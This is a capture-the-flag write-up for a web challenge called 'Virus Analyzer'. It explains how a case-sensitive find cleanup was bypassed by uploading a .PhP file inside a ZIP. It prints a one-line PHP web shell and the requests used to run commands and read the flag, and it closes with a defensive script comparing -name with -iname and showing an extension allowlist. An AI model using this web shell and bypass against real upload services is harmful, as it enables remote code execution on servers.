# Virus Analyzer

**Category:** Web

**Difficulty:** Medium

***

### 1. Challenge Overview

The challenge presents a web service called **Virus Analyzer**. The UI is sleek and professional, mimicking a security tool. It invites users to upload a `.zip` archive, which it promises to extract and analyze for malicious content. Upon visiting the site, I noticed there was no source code provided, forcing a black-box approach.

The core functionality is simple:

1. Upload a ZIP.
2. The server extracts it to a random subdirectory in `/uploads/`.
3. It lists the files and provides links to view them.
4. It claims to be "safe" because it deletes uploaded files.

***

### 2. Vulnerability Analysis

#### The Discovery Phase (Step-by-Step Testing)

Since I didn't have the source code initially, I had to poke at the server's behavior:

1. **Standard File Upload:** I uploaded a ZIP containing `test.txt`. It worked perfectly, and I could view the file at `/uploads/[ID]/test.txt`.
2. **The "PHP" Block Test:** I uploaded a ZIP containing `info.php` (with `<?php phpinfo(); ?>`).
   * **Observation:** The results page showed `info.php` was extracted, but clicking the link resulted in a **404 Not Found**.
   * **Conclusion:** There is an automated cleanup script deleting `.php` files almost immediately.
3. **The Case-Sensitivity Test:** I know that many Linux-based cleanup scripts use standard `find` commands. I decided to test if the filter was case-sensitive by uploading a ZIP with `cmd.PhP`.
   * **Observation:** This file was **NOT** deleted. I was able to access the file and it was successfully parsed as PHP by the server.

#### Code Confirmation

Once I had a working shell, I ran `cat ../../index.php` to see the actual logic. The "Aha!" moment came from this line:

```php
// Safety measure: delete all .php files after 10 seconds
$cmd = "(sleep 0 && find " . escapeshellarg($extract_dir) . " -name '*.php' -delete ) > /dev/null 2>&1 &";
exec($cmd);
```

The developer used `-name '*.php'`, which `find` matches case-sensitively on Linux. Files whose extension is any other case variant, such as `.PhP` or `.PHP`, never match the pattern and are never deleted, so the cleanup rule is bypassed completely.

***

### 3. Developing the Exploit

I needed to weaponize the case-sensitivity bypass to get full control over the server.

1. **The Payload:** I created a minimalist PHP web shell to minimize the chance of being caught by any actual "virus" scanners:

```php
<?=`$_GET[0]`?>
```

2. **The Naming:** I named the file `cmd.PhP`.
3. **The Delivery:** I zipped the file using the command line:

```bash
zip exploit.zip cmd.PhP
```

***

### 4. The PoC (Proof of Concept)

1. **Upload:** I uploaded `exploit.zip` via the web interface.
2. **Identify ID:** The site redirected me to a results page with the path: `/uploads/af3a98fdf74ef742/`.
3. **Execution:** I tested the shell by listing the root directory to see what I was working with.
   * **URL:** `http://52.59.124.14:5008/uploads/af3a98fdf74ef742/cmd.PhP?0=ls /`
   * **Result:** I saw a standard Linux directory structure and a very interesting `flag.txt` in the root.

***

### 5. The Winning Payload

With the location of the flag confirmed, the final payload was simple:

**Command:**

```http
GET /uploads/af3a98fdf74ef742/cmd.PhP?0=cat+/flag.txt
```

***

### 6. Result

The server executed the `cat` command and returned the flag content:

> **Flag:** `ENO{cl34nup_scrip7s_4r3_n07_3n0ugh_8281}`

**Key Takeaways:**

* **Blacklisting is not Security:** Relying on specific file extensions for safety is a losing game.
* **Find Command Nuance:** In Linux, `-name` is case-sensitive. To be secure, the developer should have used `-iname`.
* **Execution Context:** The web server was configured to parse any case variation of `.php` as a script, while the cleanup script was only looking for one specific version.
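To make the `-name` versus `-iname` point from the Code Confirmation section and the takeaways above concrete, here is an added example, not code from the challenge or the writeup's author, that builds a scratch directory mimicking the three test uploads, runs both cleanup variants, and counts what survives. It also shows the allowlist check the takeaways argue for: the upload handler lowercases the name and accepts only a fixed set of harmless extensions, so extension case no longer matters. The allowed extensions (`.txt`, `.log`, `.csv`) are an assumption for illustration.

```shell
#!/bin/sh
# Added example: reproduce the cleanup gap in a scratch directory and
# show how a case-insensitive match or an allowlist closes it.

# Build a constructed upload directory with the three kinds of names
# tested in the writeup (plain text, lowercase .php, mixed-case .PhP)
# plus an uppercase .PHP variant. Prints the directory path.
make_fixture() {
    dir=$(mktemp -d)
    : > "$dir/test.txt"
    printf '<?php phpinfo(); ?>' > "$dir/info.php"
    printf 'placeholder' > "$dir/cmd.PhP"
    printf 'placeholder' > "$dir/shell.PHP"
    echo "$dir"
}

# Count the regular files left after the page's cleanup (-name is
# case-sensitive). Prints the number of survivors.
survivors_after_name() {
    dir=$(make_fixture)
    find "$dir" -name '*.php' -delete
    find "$dir" -type f | wc -l | tr -d ' '
    rm -rf "$dir"
}

# Same cleanup with -iname, which matches the extension case-insensitively.
survivors_after_iname() {
    dir=$(make_fixture)
    find "$dir" -iname '*.php' -delete
    find "$dir" -type f | wc -l | tr -d ' '
    rm -rf "$dir"
}

# Allowlist check a handler could run on every archive entry before
# extraction: lowercase the name, then accept only known-harmless
# extensions (the set here is an assumption). Returns 0 if allowed.
is_allowed_name() {
    lower=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case "$lower" in
        *.txt|*.log|*.csv) return 0 ;;
        *) return 1 ;;
    esac
}

# Stand-alone run: -name leaves 3 files, -iname leaves 1.
echo "survivors with -name:  $(survivors_after_name)"
echo "survivors with -iname: $(survivors_after_iname)"
for name in test.txt info.php cmd.PhP shell.PHP; do
    if is_allowed_name "$name"; then
        echo "$name: accepted"
    else
        echo "$name: rejected"
    fi
done
```

The counts make the failure mode visible: with `-name` only `info.php` is removed and both mixed-case files stay on disk, while `-iname` removes all three. The allowlist rejects every `.php` spelling without needing to enumerate them, which is why it is the stronger control; a deferred cleanup, even a case-insensitive one, still leaves a window in which the file is servable.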
